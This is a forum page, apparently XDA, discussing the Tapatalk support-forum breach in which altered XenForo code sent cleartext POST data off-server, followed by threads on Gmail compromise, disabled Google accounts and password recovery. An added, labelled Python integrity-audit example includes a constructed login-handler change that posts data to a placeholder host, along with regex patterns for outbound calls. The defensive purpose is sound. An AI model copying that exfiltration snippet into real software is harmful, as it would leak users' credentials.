Tapatalk Breach - Security Discussion

Just got an email regarding a security breach at Tapatalk which may have exposed names, email addresses and passwords (especially if you have logged in since December 9th). I haven't seen anything posted here so my apologies if this is a repost but I'm in a rush and figured it was worth the risk.

update
southygov said:
> Just got an email regarding a security breach at Tapatalk which may have exposed names, email addresses and passwords (especially if you have logged in since December 9th). I haven't seen anything posted here so my apologies if this is a repost but I'm in a rush and figured it was worth the risk.

I'm sure someone will make something available soon. The bottom line was that someone exploited some third-party WordPress plugin that was running the blog, which allowed access to the access and forum on the support site. The rest of the Tapatalk systems were *not* affected. XenForo was modified to stream cleartext $_POST data off to a server in Sweden. A new server was created, reinstalled and the XenForo database imported from 6 days ago prior to the intrusion. The Tapatalk app and forum plugins were not on this box as auditing to do shows no sign of any intrusion past the support forum server.

So is the breach affecting only those WITH Tapatalk account... OR.... Tapatalk host all the other forums accounts (XDA, Android Central, etc.) and those are affected?
I don't have Tapatalk account. Every time I re-install the app, I re-enter the forums (i.e. XDA) account one by one.

lanwarrior said:
> So is the breach affecting only those WITH Tapatalk account... OR.... Tapatalk host all the other forums accounts (XDA, Android Central, etc.) and those are affected?
> I don't have Tapatalk account. Every time I re-install the app, I re-enter the forums (i.e. XDA) account one by one.

It was only if you had an account on the support forums as only that system was affected. Any app logins to any other sites weren't affected, unless you used the same password and email account over several sites. If you last logged into the support forums prior to 10th of December then only encrypted passwords were disclosed. The support forum runs its own authentication mechanism and is completely separate from the forum admin control panel / app / plugins.
Edit - to add, the code exploited was in WordPress, NOT in XenForo. The XenForo source code was only altered *after* WordPress was exploited. This is how cleartext passwords were made available.
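
One way to catch the kind of post-compromise source change described in this thread (application code altered so that form data leaves the server), as an added example that is not part of the original posts or Tapatalk's own tooling: compare the live PHP tree against a known-good hash manifest, then triage changed files that touch request data and also make an outbound call. The file names, the placeholder host and the sample tree are constructed for illustration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Heuristic: request-body access plus an outbound network call in the same file.
POST_RE = re.compile(r"\$_(POST|REQUEST)\b")
OUTBOUND_RE = re.compile(
    r"\b(curl_exec|fsockopen|stream_socket_client)\s*\("
    r"|file_get_contents\s*\(\s*['\"]https?://")

def build_manifest(root):
    """Map each PHP file's relative path to its SHA-256 digest."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*.php"))}

def audit(baseline, root):
    """Compare the live tree to a known-good manifest and triage changed files."""
    current = build_manifest(root)
    report = {"modified": [], "added": [], "removed": [], "suspicious": []}
    for rel, digest in current.items():
        if rel not in baseline:
            report["added"].append(rel)
        elif baseline[rel] != digest:
            report["modified"].append(rel)
        else:
            continue  # unchanged file, nothing to triage
        text = (Path(root) / rel).read_text(errors="replace")
        if POST_RE.search(text) and OUTBOUND_RE.search(text):
            report["suspicious"].append(rel)
    report["removed"] = sorted(set(baseline) - set(current))
    return report

def demo():
    """Constructed sample tree: two files change after the baseline is taken."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "library").mkdir()
        login = root / "library" / "Login.php"   # hypothetical file names
        index = root / "index.php"
        login.write_text("<?php\n$ok = check($_POST['login'], $_POST['password']);\n")
        index.write_text("<?php\nrequire 'library/Login.php';\n")
        baseline = build_manifest(root)          # taken from a trusted copy
        # Constructed change: an outbound call to a placeholder host appears
        # in the file that handles the login form.
        login.write_text(login.read_text() +
                         "$c = curl_init('https://collector.example.invalid/');\n"
                         "curl_exec($c);\n")
        index.write_text(index.read_text() + "// harmless comment change\n")
        return audit(baseline, root)

if __name__ == "__main__":
    print(demo())
```

The baseline has to come from a trusted copy (vendor release or a pre-intrusion backup) and be stored off the web server, otherwise whoever can edit the code can edit the manifest too.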

Related

[Q] GMAIL Password ?

I've had a GMail account for years, and never once had a problem. I recently got an Android phone, and started getting GMail delivery failures for emails about "acai berry" slimming, which obviously is spam I didn't send. As a developer, I can understand that servers can be hacked, and nothing is perfect.
Earlier in the week I couldn't check my GMail email from my Android phone. I then logged in from my PC & was told there was suspicious activity. I got an access code sent by SMS & reset my password. I then checked the suspicious activity & found 2 accesses to my account from Poland. Definitely not me. I still thought someone had hacked the server.
But last night alarm bells started ringing. I was running some API example code in Eclipse through the debugger on the emulator, and saw in the LogCat window some messages about permissions being requested by the app. One of them being requested was "ACCESS_GMAIL_PASSWORD" (may not have been the exact wording - I forgot to make a note of it) but it definitely said GMAIL & PASSWORD in the permission name.
Now it was only in the Emulator, which didn't have any personal info in it. But when installing apps from the Marketplace on my real phone, I always check the permissions very carefully & wouldn't have installed anything that requested my GMail password. I can't believe Google would have provided API methods to access my GMail password? Is this right? Is it possible for an app to do so without me knowing it has permission to do so? If it's possible, I may have to reconsider using GMail.
Thanks for any feedback.
Well some apps do actually require the Google login credentials. Like AppBrain for example. And I've been using AppBrain forever with no problem.
Sent from my DROIDX using Tapatalk
Yeah, but shouldn't we be aware of these permissions when we are installing? I know I haven't installed any apps that explicitly said they would access my GMail account.
Well I've checked for the following applications I've got on my phone and that use Gmail password:
- Android Market
- Chrome to Phone
- Gmail
- Google Reader
- GTasks
- Google Maps
and for all of them in the Authorisations list it is clearly written "Use an account authentication information" (I've translated from what I read in French so it may not be the exact wording in English).
So IMO if you use at least Android Market and Gmail application you have inevitably given access to your Gmail password.
On that list I have
- Android Market
- GMail
- Google Maps
All were pre-installed on the phone. Also, I trust the authors of these pieces of software. The problem is my GMail account has been accessed by a spammer sending "Acai berry" slimming emails. I don't think Google would misuse my GMail password for this purpose.
I am more concerned that I have been downloading apps from the Marketplace & one of them got my GMail password. I realise that apps have "Full internet access" when they are ad sponsored, I suspect a rogue app accessed my GMail password & then used its internet access to send the password to a spammer.
I have several apps from sources I don't fully trust, with "Full Internet Access". But I don't have any that asked for Account Authorisation when installed.
Is there any way I can recheck what apps can access my GMail password?
Thanks.
There is an app on the market called task identifier that should help you out.
Sent from my DROIDX using Tapatalk
Looks exactly what I'm after. Thanks.
gungh0 said:
> Looks exactly what I'm after. Thanks.

No problem. Good luck with it all.
Sent from my DROIDX using Tapatalk

Problem with Google Account Disabled

Hi everybody,
I have a little problem with my Google Account. About 1 year ago, my account (alessio.buccoliero) has been disabled. I've created a new one (alessio.buccoliero.new), and it has been disabled too. At that point, I've created a new one, changing the name, and it worked for a while, until yesterday (disabled). I need a Google Account because I have an Android Phone but I don't want to create one every 3 months. If I try to contact Google, they don't reply to me and don't explain why they disabled the account.
I don't use Google services in any wrong way, AFAIK, but I noticed that the ban occurs when I try to upload photos on Picasa or use Google Drive (recently) or Google+.
Does anybody know if Google uses a sort of "blacklist" of users that have been banned once or more times in order to disable their account recursively?
Has anybody experienced the same problem?
Any help is welcome.
Thanks in advance,
Alessio
Same thing happened to my friend today for no reason. Not sure how to fix it :-\
Mmmh, thank you. It's very strange...
Anyone else?
Alessio
What is the message that tells you it is disabled? And when do you get that message?
Sent from my GT-I9100 using XDA
What is your banned message?
There is a high relevance to the actual email or notification or email address you set as your original email address when creating the Gmail account.
Now your secondary email should have a mail from Google telling you why you were banned.
When I try to login with my credentials I'm redirected to a page that contains this message.
> Account has been disabled
> If you've been redirected to this page from the sign-in page, it means that access to your Google Account has been disabled.
> In most cases, accounts are disabled if we believe you have violated either the Google Terms of Service, product-specific Terms of Service (available on the product page), or product-specific policies. Your account has not been deleted, your data is still intact, and it might be possible to regain access to your account.
> Why Google disables accounts
> Google wants to ensure that everyone has a chance to safely and securely connect and communicate. To help preserve this environment, Google reserves the right to:
> Suspend a Google Account from using a particular product or the entire Google Accounts system if there is a violation of the Google Terms of Service, product-specific Terms of Service (available on the product page), or product-specific policies.
> Terminate your account at any time, for any reason, with or without notice.
> Next steps for disabled accounts
> Please start by reviewing the relevant Terms of Service. Then, if you think your account should not have been disabled, please contact us.

I tried to send them emails and messages but they don't reply to me and I have no messages from Google in my secondary mailbox (the one I provided when I set up the account).
Really, don't know what is happening...

ISP Email or Gmail/Hotmail etc?

I'm just curious what everyone uses most for day to day? Your email accounts that come included with your home internet or online services like Gmail and Hotmail?
I have 2 email accounts on my ISP that I use for most stuff. My Gmail account tied to my phone I only use for Google Play and nothing else. The reason I prefer using my ISP email is because it's less popular and less prone to datamining by big online entities like Google or MS and they're just as disposable. I guess I feel a little better deep inside letting Rogers spy on my activities than an international giant online entity.
For example, I'll use my ISP email accounts to sign up for PayPal, dropbox, eBay etc rather than Gmail.
Just curious what others prefer
Neither. I bought my own domain and use e-mail on that for everything personal - gives me as many different addresses as I want for self, webmaster etc.
Of course, there are many times when I also create a spam-drop address for web-site sign-ups.
Gmail. I have my own domains as well, and use them on Google Apps.
It's convenient. I've been using my gmail since near the start of gmail and there's no reason to really change it.
SimonTS said:
> Neither. I bought my own domain and use e-mail on that for everything personal - gives me as many different addresses as I want for self, webmaster etc.
> Of course, there are many times when I also create a spam-drop address for web-site sign-ups.

+1
I have my own server so I'm in total control of what I can do.
One Gmail and then my own domain for the other addresses I need, work etc.
Sent from my GT-N7000 using xda premium
I'm rocking Hotmail
Sent from my GT-I9100 using Tapatalk 2
SimonTS said:
> Neither. I bought my own domain and use e-mail on that for everything personal - gives me as many different addresses as I want for self, webmaster etc.
> Of course, there are many times when I also create a spam-drop address for web-site sign-ups.

How does the search function work on that? I think Gmail has surpassed Hotmail as it is really easy to use and groups emails together. I never thought I would switch to Gmail but it seems superior at the moment.
PassingExpert said:
> How does the search function work on that? I think Gmail has surpassed Hotmail as it is really easy to use and groups emails together. I never thought I would switch to Gmail but it seems superior at the moment.

Hotmail has this thing called Outlook.com which resembles Gmail
Sent from my GT-I9100 using Tapatalk 2
PassingExpert said:
> How does the search function work on that? I think Gmail has surpassed Hotmail as it is really easy to use and groups emails together. I never thought I would switch to Gmail but it seems superior at the moment.

Outlook.com is more in line with what Gmail has to offer. MS is finally rebranding and doing away with Hotmail. I like how you can create a throwaway email addy in an instant.
Recently set up an outlook.com address and thinking of migrating to that from Gmail. A few articles I have read indicate that MS will be taking users' privacy a little more seriously than Google does.
Sent from my cm_tenderloin using Tapatalk 2
migrating webmail services?
wiggerbrand said:
> Recently set up an outlook.com address and thinking of migrating to that from Gmail. A few articles I have read indicate that MS will be taking users' privacy a little more seriously than Google does.
> Sent from my cm_tenderloin using Tapatalk 2

How long have you been using g-mail???
I can't imagine it would be easy to migrate
Slotty_AU said:
> How long have you been using g-mail???
> I can't imagine it would be easy to migrate

It's REAL easy, I used gmail for 4 years and it took me 2 days to get used to Hotmail
Sent from my GT-I9100 using Tapatalk 2
Android and Gmail, changes and challenges

[Completed] Every time I use Google+ login, it redirects me to some weird new account, why?

To make it as simple as possible:
I registered my account and bound it to certain Gmail address that I use for basically everything.
When I log in using my ACCOUNT NAME, it redirects me to this account. But when I use GOOGLE+ login form, it logs me into some weird new account called bill pap CLICK ME, despite the fact that my Gmail is bound to Amadeusz90.
What is going on, did somebody try to hijack my mail/XDA account? How the hell do I get redirected to some weird account while using my own e-mail?
Can you give it a look, XDA team? Thanks in advance.
Amadeusz90 said:
> To make it as simple as possible:
> I registered my account and bound it to certain Gmail address that I use for basically everything.
> When I log in using my ACCOUNT NAME, it redirects me to this account. But when I use GOOGLE+ login form, it logs me into some weird new account called bill pap CLICK ME, despite the fact that my Gmail is bound to Amadeusz90.
> What is going on, did somebody try to hijack my mail/XDA account? How the hell do I get redirected to some weird account while using my own e-mail?
> Can you give it a look, XDA team? Thanks in advance.

Hello,
It seems like your browser is at fault. Try a different one or clear cache and try again.
Regards
Vatsal,
Forum Moderator.

Recover google password

Hey buddies, I'm looking for some help
Basically I changed the pass of my main Google account one week ago being sure that my browser saved it like I always do but it didn't happen.
I forgot it (prob I'm missing some words) and I can't retrieve it because Google is a ***** one, I tried many times to recover it fulfilling all the camps but I can't complete the recovery mail one since the mail that I linked with the acc is expired somehow
So I'm looking for a way to recover the pass directly from the phone since I'm still logged in there, I tried with sniffing packets within my wifi but I got nothing and with looking for some database but nothing again
Any ideas or software that can help me out?
h320 said:
> Hey buddies, I'm looking for some help
> Basically I changed the pass of my main Google account one week ago being sure that my browser saved it like I always do but it didn't happen.
> I forgot it (prob I'm missing some words) and I can't retrieve it because Google is a ***** one, I tried many times to recover it fulfilling all the camps but I can't complete the recovery mail one since the mail that I linked with the acc is expired somehow
> So I'm looking for a way to recover the pass directly from the phone since I'm still logged in there, I tried with sniffing packets within my wifi but I got nothing and with looking for some database but nothing again
> Any ideas or software that can help me out?

There is no need to use software or any kind of "hack" to recover the password if you are signed into the device with that account, as you claim you are.
If you're signed into the phone with the same Google account, use the "forgot password" feature, it will send an email to your gmail account, then just open the gmail app on the device and then find the email they send to change the password. If you are signed into the device with that account then you have access to the gmail app and the email for that account so this method should be sufficient.
Sent from my LGL84VL using Tapatalk
Droidriven said:
> There is no need to use software or any kind of "hack" to recover the password if you are signed into the device with that account, as you claim you are.
> If you're signed into the phone with the same Google account, use the "forgot password" feature, it will send an email to your gmail account, then just open the gmail app on the device and then find the email they send to change the password. If you are signed into the device with that account then you have access to the gmail app and the email for that account so this method should be sufficient.
> Sent from my LGL84VL using Tapatalk

Hello mate, thanks for your reply.
Yes, I'm logged into my main phone with the account that I'm trying to recover. If I do the "forgot password" feature from the browser or from the phone directly it will ask me the same things like it already did. I can complete all steps apart the mail one since the recovery mail is expired (my bad that I didn't change it).
For that I'm looking for some software/tricky way.
Regards.
